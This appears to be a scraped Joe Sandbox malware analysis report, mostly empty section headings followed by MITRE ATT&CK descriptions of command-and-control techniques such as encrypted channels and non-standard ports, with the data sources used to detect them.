Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

SMTP Packets

Code Manipulations

Statistics

CPU Usage

Function 00B8F419, Relevance: .6, Instructions: 625
COMMONCrypto

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre